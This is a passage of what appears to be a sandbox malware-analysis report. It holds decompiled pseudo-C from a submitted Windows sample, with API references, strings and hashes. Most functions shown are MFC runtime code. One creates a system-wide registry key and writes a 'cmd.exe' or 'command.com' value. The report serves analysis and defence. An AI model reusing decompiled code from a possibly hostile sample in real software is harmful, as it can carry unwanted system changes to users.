								 *_v128 = 0;
								goto L26;
							}
						}
					} else {
						_t81 = E0040DDA7(0x104, _t90, _t96, _t99, _t102, 0xe000,  &_v124, 0x100);
						__eflags = _t81;
						if(_t81 == 0) {
							_push( *(_t99 + 0x60));
						} else {
							_push( &_v124);
						}
						_t58 = E0041FD45();
						__eflags = _t58;
						 *(_t99 + 0x50) = _t58;
						_pop(_t90);
						if(_t58 == 0) {
							goto L14;
						} else {
							goto L20;
						}
					}
				} else {
					_t84 = E0041FD45( &_a132);
					__eflags = _t84;
					_pop(_t90);
					 *(_t99 + 0x60) = _t84;
					if(_t84 != 0) {
						goto L15;
					} else {
						L14:
						_push(_t102);
						_t105 = _t109;
						_push(_t90);
						_v804 = 0x442350;
						E0041F7F4( &_v804, 0x43c4ec);
						asm("int3");
						_push(_t105);
						_t106 = _t109;
						_push(_t90);
						_t11 =  &_v812; // 0x442350
						_v812 = 0x4423e8;
						E0041F7F4(_t11, 0x43c54c);
						asm("int3");
						_push(_t106);
						_push(_t90);
						_t13 =  &_v820; // 0x4423e8
						_v820 = 0x442480;
						E0041F7F4(_t13, 0x43c590);
						asm("int3");
						_push(4);
						E0041F6EA(E00431BFC, 0x104, _t96, _t99);
						_t93 = E0040F014(0x104);
						_v832 = _t93;
						_t73 = 0;
						_v820 = 0;
						if(_t93 != 0) {
							_t73 = E0040D519(_t93);
						}
						return E0041F7C2(_t73);
					}
				}
			}

0x0041ab2a
0x0041ab2a
0x0041ab2b
0x0041ab32
0x0041ab38
0x0041ab3f
0x0041ab45
0x0041ab47
0x0041ab48
0x0041ab4f
0x0041ab54
0x0041ab5a
0x0041ab75
0x0041ab7b
0x0041ab7b
0x0041ab77
0x0041ab77
0x0041ab79
0x00000000
0x00000000
0x0041ab79
0x0041ab87
0x0041ab8d
0x0041ab8f
0x0041ab92
0x0041ab94
0x0041ab94
0x0041ab9c
0x0041abae
0x0041abb3
0x0041abb5
0x0041abb7
0x0041abb7
0x0041abbc
0x0041abc0
0x0041abdb
0x0041abdb
0x0041abde
0x0041abe0
0x0041ac0f
0x0041ac0f
0x0041ac12
0x0041ac16
0x0041ac59
0x0041ac59
0x0041ac5d
0x0041ac91
0x0041ac97
0x0041ac98
0x0041ac9b
0x0041ac9c
0x0041aca1
0x0041aca8
0x0041ac5f
0x0041ac71
0x0041ac72
0x0041ac7e
0x0041ac83
0x0041ac86
0x0041ac88
0x0041ac8b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ac8b
0x0041ac18
0x0041ac1e
0x0041ac21
0x0041ac25
0x0041ac2e
0x0041ac27
0x0041ac27
0x0041ac27
0x0041ac33
0x0041ac34
0x0041ac37
0x0041ac42
0x0041ac46
0x0041ac4b
0x0041ac4d
0x0041ac4e
0x0041ac51
0x00000000
0x0041ac53
0x0041ac53
0x0041ac56
0x00000000
0x0041ac56
0x0041ac51
0x0041abe2
0x0041abf0
0x0041abf5
0x0041abf7
0x0041abff
0x0041abf9
0x0041abfc
0x0041abfc
0x0041ac02
0x0041ac07
0x0041ac09
0x0041ac0c
0x0041ac0d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ac0d
0x0041abc2
0x0041abc9
0x0041abce
0x0041abd0
0x0041abd1
0x0041abd4
0x00000000
0x0041abd6
0x0041abd6
0x004037af
0x004037b0
0x004037b2
0x004037bc
0x004037c3
0x004037c8
0x004037c9
0x004037ca
0x004037cc
0x004037d2
0x004037d6
0x004037dd
0x004037e2
0x004037e3
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b
0x0041abd4

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041AB6D
PathFindExtensionA.KERNELBASE(?), ref: 0041AB87
__strdup.LIBCMT ref: 0041ABC9
__strdup.LIBCMT ref: 0041AC02
__strdup.LIBCMT ref: 0041AC46
_strcat_s.LIBCMT ref: 0041AC6C
__strdup.LIBCMT ref: 0041AC7E

Strings

.HLP, xrefs: 0041AC2E
.CHM, xrefs: 0041AC27
.INI, xrefs: 0041AC5F

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
String ID: .CHM$.HLP$.INI
API String ID: 1153805871-4017452060
Opcode ID: c49fd2a1216ea896ee94d8016267d423bc5801ae71d4a536f5c85aa2f1552b22
Instruction ID: 57232d50dc1b964aec71869080f5721069c83be35b5a1d3d80364e0175c1dcf5
Opcode Fuzzy Hash: c49fd2a1216ea896ee94d8016267d423bc5801ae71d4a536f5c85aa2f1552b22
Instruction Fuzzy Hash: 51416D715012499FDB30EFA9CD85BDB77ECBF04308F00482BE945D6641EB78E9948B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402750, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00402750(intOrPtr __ecx, CHAR* _a4) {
				void* _v8;
				int _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				long _t32;
				int _t34;
				char* _t36;
				long _t37;
				char* _t46;
				char* _t48;

				_v32 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t46 =  *0x442000; // 0x4346d4
				_v16 = RegCreateKeyExA(0x80000002, _t46, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
				if(_v16 == 0) {
					_v28 = 0x104;
					_v20 = GetVersion();
					if(_v20 >= 0x80000000) {
						E0041EB60(_a4, "command.com");
					} else {
						E0041EB60(_a4, "cmd.exe");
					}
					_t48 =  *0x442008; // 0x434684
					_t32 = RegQueryValueExA(_v8, _t48, 0,  &_v24, _a4,  &_v28); // executed
					_v16 = _t32;
					if(_v16 != 0) {
						_t34 = lstrlenA(_a4);
						_t36 =  *0x442008; // 0x434684
						_t37 = RegSetValueExA(_v8, _t36, 0, 1, _a4, _t34 + 1); // executed
						_v16 = _t37;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x00402756
0x00402759
0x00402760
0x0040277c
0x0040278e
0x00402795
0x0040279b
0x004027a8
0x004027b2
0x004027d0
0x004027b4
0x004027bd
0x004027c2
0x004027e6
0x004027f1
0x004027f7
0x004027fe
0x00402804
0x00402816
0x00402820
0x00402826
0x00402826
0x0040282d
0x0040282d
0x00402839

APIs

RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402788
GetVersion.KERNEL32 ref: 004027A2
_strcat.LIBCMT ref: 004027BD
_strcat.LIBCMT ref: 004027D0
RegQueryValueExA.KERNELBASE(00000000,00434684,00000000,?,?,00000104), ref: 004027F1
lstrlenA.KERNEL32(?), ref: 00402804
RegSetValueExA.KERNELBASE(00000000,00434684,00000000,00000001,?,-00000001), ref: 00402820
RegCloseKey.ADVAPI32(00000000), ref: 0040282D

Strings

command.com, xrefs: 004027C7
cmd.exe, xrefs: 004027B4

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Value_strcat$CloseCreateQueryVersionlstrlen
String ID: cmd.exe$command.com
API String ID: 2337509535-906605525
Opcode ID: 23a86dbd8a56b400e1eae7f4a72586dde06780c802320ec2f8d035002184cb91
Instruction ID: 5414f4e155f680cb360236f53e8781cc7486691db9c8143961ece0993b29ec0d
Opcode Fuzzy Hash: 23a86dbd8a56b400e1eae7f4a72586dde06780c802320ec2f8d035002184cb91
Instruction Fuzzy Hash: CB21EAB9D00208EFDB14DFD5DD49BEEB7B8AB48701F108569F605A7280D7B86644CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1AF, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040F1AF() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x4465f0
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x5c00f8
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E0040EAD1(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E0040EAD1(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E0041F330(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x5c00f8
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x442350;
							E0041F7F4( &_v28, 0x43c4ec);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_t7 =  &_v36; // 0x442350
							_v36 = 0x4423e8;
							E0041F7F4(_t7, 0x43c54c);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_t9 =  &_v44; // 0x4423e8
							_v44 = 0x442480;
							E0041F7F4(_t9, 0x43c590);
							asm("int3");
							_push(4);
							E0041F6EA(E00431BFC, _t69, _t82, _t86);
							_t78 = E0040F014(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E0040D519(_t78);
							}
							return E0041F7C2(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x5c00f8
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x5c00f8
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x5c00f8
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

0x0040f1af
0x0040f1b0
0x0040f1b1
0x0040f1b3
0x0040f1b5
0x0040f1b5
0x0040f1ba
0x0040f1be
0x0040f1c4
0x0040f1c4
0x0040f1c7
0x0040f1c7
0x0040f1cc
0x0040f1db
0x0040f1dd
0x0040f1de
0x0040f1e0
0x0040f1fd
0x0040f1fd
0x0040f1fd
0x0040f200
0x0040f200
0x0040f203
0x0040f205
0x0040f223
0x0040f226
0x0040f234
0x0040f23a
0x0040f23d
0x0040f207
0x0040f20a
0x0040f210
0x0040f214
0x0040f214
0x0040f243
0x0040f245
0x0040f272
0x0040f274
0x0040f27b
0x0040f285
0x0040f28d
0x0040f290
0x00000000
0x0040f247
0x0040f247
0x0040f247
0x0040f24a
0x0040f24c
0x0040f256
0x0040f256
0x0040f260
0x004037af
0x004037b0
0x004037b2
0x004037bc
0x004037c3
0x004037c8
0x004037c9
0x004037ca
0x004037cc
0x004037d2
0x004037d6
0x004037dd
0x004037e2
0x004037e3
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b
0x0040f1e2
0x0040f1e2
0x0040f1e5
0x0040f1e5
0x0040f1e8
0x0040f1e8
0x0040f1eb
0x00000000
0x00000000
0x0040f1ed
0x0040f1ee
0x0040f1f1
0x0040f1f3
0x00000000
0x00000000
0x00000000
0x0040f1f3
0x0040f1f5
0x0040f1f7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f1f7
0x0040f1ce
0x0040f1ce
0x0040f1ce
0x0040f1d1
0x0040f1d5
0x0040f293
0x0040f293
0x0040f293
0x0040f296
0x0040f298
0x0040f29b
0x0040f29b
0x0040f29e
0x0040f2a5
0x0040f2a8
0x0040f2a8
0x0040f2ab
0x0040f2ae
0x0040f2b1
0x0040f2be
0x00000000
0x00000000
0x00000000
0x0040f1d5

APIs

EnterCriticalSection.KERNEL32(004465F0,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F1BE
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040F214
GlobalHandle.KERNEL32(005C00F8), ref: 0040F21D
GlobalUnlock.KERNEL32(00000000,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F226
GlobalReAlloc.KERNEL32 ref: 0040F23D
GlobalHandle.KERNEL32(005C00F8), ref: 0040F24F
GlobalLock.KERNEL32 ref: 0040F256
LeaveCriticalSection.KERNEL32(?,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F260
GlobalLock.KERNEL32 ref: 0040F26C
_memset.LIBCMT ref: 0040F285
LeaveCriticalSection.KERNEL32(?), ref: 0040F2B1

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: ab9b4bc25e8910a791046d6b5618164ea1d03aab9b28a44e83847fc91879861a
Instruction ID: 472e247d442e6808826630594bb4930a6e592a8447ca6d80117307b8de69ac9d
Opcode Fuzzy Hash: ab9b4bc25e8910a791046d6b5618164ea1d03aab9b28a44e83847fc91879861a
Instruction Fuzzy Hash: D031AD79204B049FD724CF64DC48A67B7E8FB84344B00497EE852E3A91EB39F9488B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3B1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040B3B1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				long _t39;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E0041F71D(E00432451, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E00409C97(1, _t60, _t71,  *(_t71 + 0x14));
					E0040B2C5(_t60, E00409C97(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E0040B33B(1, _t66, E00409C97(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								_t39 = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14)); // executed
								 *(_t71 - 0x14) = _t39;
							} else {
								E004089E1(E00409C97(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E0040A26C(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E0041F7C2( *(_t71 - 0x14));
			}

0x0040b3b1
0x0040b3b1
0x0040b3b1
0x0040b3b8
0x0040b3bd
0x0040b3c0
0x0040b3c7
0x0040b3cd
0x0040b3d1
0x0040b3d5
0x0040b3dd
0x0040b3de
0x0040b3e1
0x0040b48a
0x0040b49c
0x00000000
0x0040b3e7
0x0040b3e7
0x0040b3ea
0x0040b482
0x0040b4a1
0x0040b4a3
0x00000000
0x00000000
0x0040b3ec
0x0040b3ec
0x0040b3ef
0x0040b448
0x0040b450
0x0040b45e
0x00000000
0x0040b3f1
0x0040b3f6
0x0040b4a5
0x0040b4b2
0x0040b4b8
0x0040b3fc
0x0040b40d
0x0040b42a
0x0040b432
0x0040b432
0x0040b3f6
0x0040b3ef
0x0040b3ea
0x0040b43f

APIs

__EH_prolog3_catch.LIBCMT ref: 0040B3B8
GetPropA.USER32 ref: 0040B3C7
CallWindowProcA.USER32 ref: 0040B421

Part of subcall function 0040A26C: GetWindowRect.USER32 ref: 0040A294
Part of subcall function 0040A26C: GetWindow.USER32(?,00000004), ref: 0040A2B1

SetWindowLongA.USER32 ref: 0040B448
RemovePropA.USER32 ref: 0040B450
GlobalFindAtomA.KERNEL32 ref: 0040B457
GlobalDeleteAtom.KERNEL32 ref: 0040B45E

Part of subcall function 004089E1: GetWindowRect.USER32 ref: 004089ED

CallWindowProcA.USER32 ref: 0040B4B2

Strings

AfxOldWndProc423, xrefs: 0040B3C0, 0040B3C5, 0040B44E, 0040B456

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 01eafed39850b2931418d763da063fa8131308eeaf296203092cb49c53425a31
Instruction ID: 0993d68df0da385a064f2654fdce3d9da4ed98816b6640c1b1e46963a59409c9
Opcode Fuzzy Hash: 01eafed39850b2931418d763da063fa8131308eeaf296203092cb49c53425a31
Instruction Fuzzy Hash: 40316D7280020AABCB01AFA4DD49DFF7E78EF45310F00013AF941B21A2C7789A119BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401450, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 196
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00401450(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v303;
				char _v304;
				char _v2351;
				char _v2352;
				signed int _v2356;
				intOrPtr* _v2360;
				intOrPtr* _v2364;
				intOrPtr _v2392;
				intOrPtr _v2416;
				intOrPtr _v2420;
				intOrPtr _v2444;
				intOrPtr _v2448;
				struct HINSTANCE__* _v2452;
				intOrPtr* _v2456;
				void* __ebp;
				signed int _t101;
				signed int _t102;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				void* _t116;
				intOrPtr _t117;
				void* _t118;
				char _t119;
				intOrPtr _t129;
				struct HICON__* _t138;
				void* _t141;
				char _t183;
				void* _t201;
				void* _t202;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t207;

				_t209 = __eflags;
				_t202 = __esi;
				_t201 = __edi;
				_t141 = __ebx;
				_push(0xffffffff);
				_push(E00431ADC);
				_push( *[fs:0x0]);
				_t205 = _t204 - 0x988;
				_t101 =  *0x443590; // 0xa920217c
				_t102 = _t101 ^ _t203;
				_v36 = _t102;
				_push(_t102);
				 *[fs:0x0] =  &_v16;
				_v2456 = __ecx;
				E00405CC0(_v2456, 0x67, _a4);
				_v8 = 0;
				 *_v2456 = 0x434b2c;
				_v2360 = _v2456 + 0x78;
				E0040899E(_v2360, __eflags);
				 *_v2360 = 0x4349f4;
				_v8 = 1;
				_v2364 = _v2456 + 0xcc;
				E0040899E(_v2364, _t209);
				 *_v2364 = 0x4349f4;
				_v8 = 2;
				E00402890(_v2456 + 0x12c);
				_v8 = 3;
				E00402890(_v2456 + 0x134);
				_v8 = 4;
				_v24 = 0;
				_v2356 = 0;
				_v32 = 0;
				_v20 = 0;
				_v28 = 0;
				_t111 =  *0x442014; // 0x43463c
				_t112 = E004024B0(_v2456,  &_v24, _t111); // executed
				if(_t112 == 0) {
					_v32 = 0 | _v24 != 0x00000000;
				}
				_t113 =  *0x442018; // 0x434620
				_t114 = E004024B0(_v2456,  &_v24, _t113); // executed
				if(_t114 == 0) {
					_v20 = 0 | _v24 != 0x00000000;
				}
				_t115 =  *0x44201c; // 0x434600
				_t116 = E004024B0(_v2456,  &_v24, _t115); // executed
				if(_t116 == 0) {
					_v28 = 0 | _v24 != 0x00000000;
				}
				_t117 =  *0x44200c; // 0x434670
				_t118 = E004024B0(_v2456,  &_v24, _t117); // executed
				if(_t118 == 0) {
					_v2356 = 0 | _v24 != 0x00000000;
				}
				_t119 =  *0x4349e8; // 0x0
				_v2352 = _t119;
				E0041F330(_t201,  &_v2351, 0, 0x7ff);
				_t183 =  *0x4349e8; // 0x0
				_v304 = _t183;
				E0041F330(_t201,  &_v303, 0, 0x103);
				_t207 = _t205 + 0x18;
				E004025F0(_v2456,  &_v2352); // executed
				E00402750(_v2456,  &_v304); // executed
				 *(_v2456 + 0x130) = _v2356;
				 *(_v2456 + 0x120) = _v32;
				 *(_v2456 + 0x124) = _v20;
				 *(_v2456 + 0x128) = _v28;
				_v2416 = _v2456 + 0x12c;
				if( &_v2352 != 0) {
					_t129 = E0041F2A0( &_v2352);
					_t207 = _t207 + 4;
					_v2392 = _t129;
				} else {
					_v2392 = 0;
				}
				E00402B10(_t141, _v2416,  &_v2352, _v2392);
				_v2444 = _v2456 + 0x134;
				_t223 =  &_v304;
				if( &_v304 != 0) {
					_v2420 = E0041F2A0( &_v304);
				} else {
					_v2420 = 0;
				}
				E00402B10(_t141, _v2444,  &_v304, _v2420);
				_v2448 =  *((intOrPtr*)(E0040DB94(_t141, _t201, _t202, _t223) + 4));
				_v2452 =  *((intOrPtr*)(E0040DB94(_t141, _t201, _t202, _t223) + 0xc));
				_t138 = LoadIconA(_v2452, 0x65); // executed
				 *(_v2456 + 0x74) = _t138;
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return E0041E5DF(_v2456, _t141, _v36 ^ _t203, _v2452, _t201, _t202);
			}

0x00401450
0x00401450
0x00401450
0x00401450
0x00401453
0x00401455
0x00401460
0x00401461
0x00401467
0x0040146c
0x0040146e
0x00401471
0x00401475
0x0040147b
0x0040148d
0x00401492
0x0040149f
0x004014ae
0x004014ba
0x004014c5
0x004014cb
0x004014db
0x004014e7
0x004014f2
0x004014f8
0x00401508
0x0040150d
0x0040151d
0x00401522
0x00401526
0x0040152d
0x00401537
0x0040153e
0x00401545
0x0040154c
0x0040155c
0x00401563
0x0040156e
0x0040156e
0x00401571
0x00401581
0x00401588
0x00401593
0x00401593
0x00401596
0x004015a6
0x004015ad
0x004015b8
0x004015b8
0x004015bb
0x004015cb
0x004015d2
0x004015dd
0x004015dd
0x004015e3
0x004015e8
0x004015fc
0x00401604
0x0040160a
0x0040161e
0x00401623
0x00401633
0x00401645
0x00401656
0x00401665
0x00401674
0x00401683
0x00401695
0x004016a3
0x004016b8
0x004016bd
0x004016c0
0x004016a5
0x004016a5
0x004016a5
0x004016da
0x004016eb
0x004016f7
0x004016f9
0x00401716
0x004016fb
0x004016fb
0x004016fb
0x00401730
0x0040173d
0x0040174b
0x0040175a
0x00401766
0x00401769
0x00401779
0x0040178e

APIs

Part of subcall function 00405CC0: _memset.LIBCMT ref: 00405CD7

Part of subcall function 004024B0: RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00401561,00000000,0043463C), ref: 004024E8
Part of subcall function 004024B0: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000004), ref: 0040251D
Part of subcall function 004024B0: RegCloseKey.ADVAPI32(00000000), ref: 00402545

_memset.LIBCMT ref: 004015FC
_memset.LIBCMT ref: 0040161E
_strlen.LIBCMT ref: 004016B8
_strlen.LIBCMT ref: 0040170E
LoadIconA.USER32(00000000,00000065), ref: 0040175A

Strings

pFC, xrefs: 004015BB
FC, xrefs: 00401571
<FC, xrefs: 0040154C

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: _memset$_strlen$CloseCreateIconLoadQueryValue
String ID: FC$<FC$pFC
API String ID: 615173687-2136651500
Opcode ID: c09a520e972cbed81c92c8a8f446ce9723face874d1e5d1072ee138f9bd11dab
Instruction ID: 457884dcc3c456c3af197bac72be006a206e89a30ea0593d6f0c271eb38810d0
